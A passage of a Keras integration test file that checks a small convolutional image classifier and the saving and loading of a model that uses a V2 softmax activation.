    self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
    predictions = model.predict(sequences)
    self.assertEqual(predictions.shape, (sequences.shape[0], 2))
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class ImageClassificationIntegrationTest(keras_parameterized.TestCase):
  """End-to-end check for a small convolutional classifier."""

  def test_image_classification(self):
    np.random.seed(1337)
    (images, targets), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=0,
        input_shape=(10, 10, 3),
        num_classes=2)
    targets = keras.utils.to_categorical(targets)
    conv_stack = [
        keras.layers.Conv2D(4, 3, padding='same', activation='relu'),
        keras.layers.Conv2D(8, 3, padding='same'),
        keras.layers.BatchNormalization(),
        keras.layers.Conv2D(8, 3, padding='same'),
        keras.layers.Flatten(),
        keras.layers.Dense(targets.shape[-1], activation='softmax'),
    ]
    model = testing_utils.get_model_from_layers(
        conv_stack, input_shape=images.shape[1:])
    model.compile(
        loss='categorical_crossentropy',
        optimizer=keras.optimizer_v2.adam.Adam(0.005),
        metrics=['acc'],
        run_eagerly=testing_utils.should_run_eagerly())
    history = model.fit(images, targets, epochs=10, batch_size=10,
                        validation_data=(images, targets),
                        verbose=2)
    self.assertGreater(history.history['val_acc'][-1], 0.7)
    _, val_acc = model.evaluate(images, targets)
    self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
    predictions = model.predict(images)
    self.assertEqual(predictions.shape, (images.shape[0], 2))
@keras_parameterized.run_all_keras_modes
class ActivationV2IntegrationTest(keras_parameterized.TestCase):
  """Tests activation function V2 in model exporting and loading.

  This test is to verify in TF 2.x, when 'tf.nn.softmax' is used as an
  activation function, its model exporting and loading work as expected.
  Check b/123041942 for details.
  """

  def test_serialization_v2_model(self):
    np.random.seed(1337)
    (x_train, y_train), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=0,
        input_shape=(10,),
        num_classes=2)
    y_train = keras.utils.to_categorical(y_train)
    model = keras.Sequential([
        keras.layers.Flatten(input_shape=x_train.shape[1:]),
        keras.layers.Dense(10, activation=nn.relu),
        # To mimic 'tf.nn.softmax' used in TF 2.x.
        keras.layers.Dense(y_train.shape[-1], activation=nn.softmax_v2),
    ])
    # The V2 op must serialize under the canonical name 'softmax' in
    # the layer config.
    last_layer_activation = model.get_layer(index=2).get_config()['activation']
    self.assertEqual(last_layer_activation, 'softmax')
    model.compile(loss='categorical_crossentropy',
                  optimizer=keras.optimizer_v2.adam.Adam(0.005),
                  metrics=['accuracy'],
                  run_eagerly=testing_utils.should_run_eagerly())
    model.fit(x_train, y_train, epochs=2, batch_size=10,
              validation_data=(x_train, y_train),
              verbose=2)
    # Round-trip through SavedModel and compare the architectures.
    output_path = os.path.join(self.get_temp_dir(), 'tf_keras_saved_model')
    keras.saving.saved_model.export_saved_model(model, output_path)
    loaded_model = keras.saving.saved_model.load_from_saved_model(output_path)
    self.assertEqual(model.summary(), loaded_model.summary())
if __name__ == '__main__':
  # Run all test cases in this module via the TF test runner.
  test.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.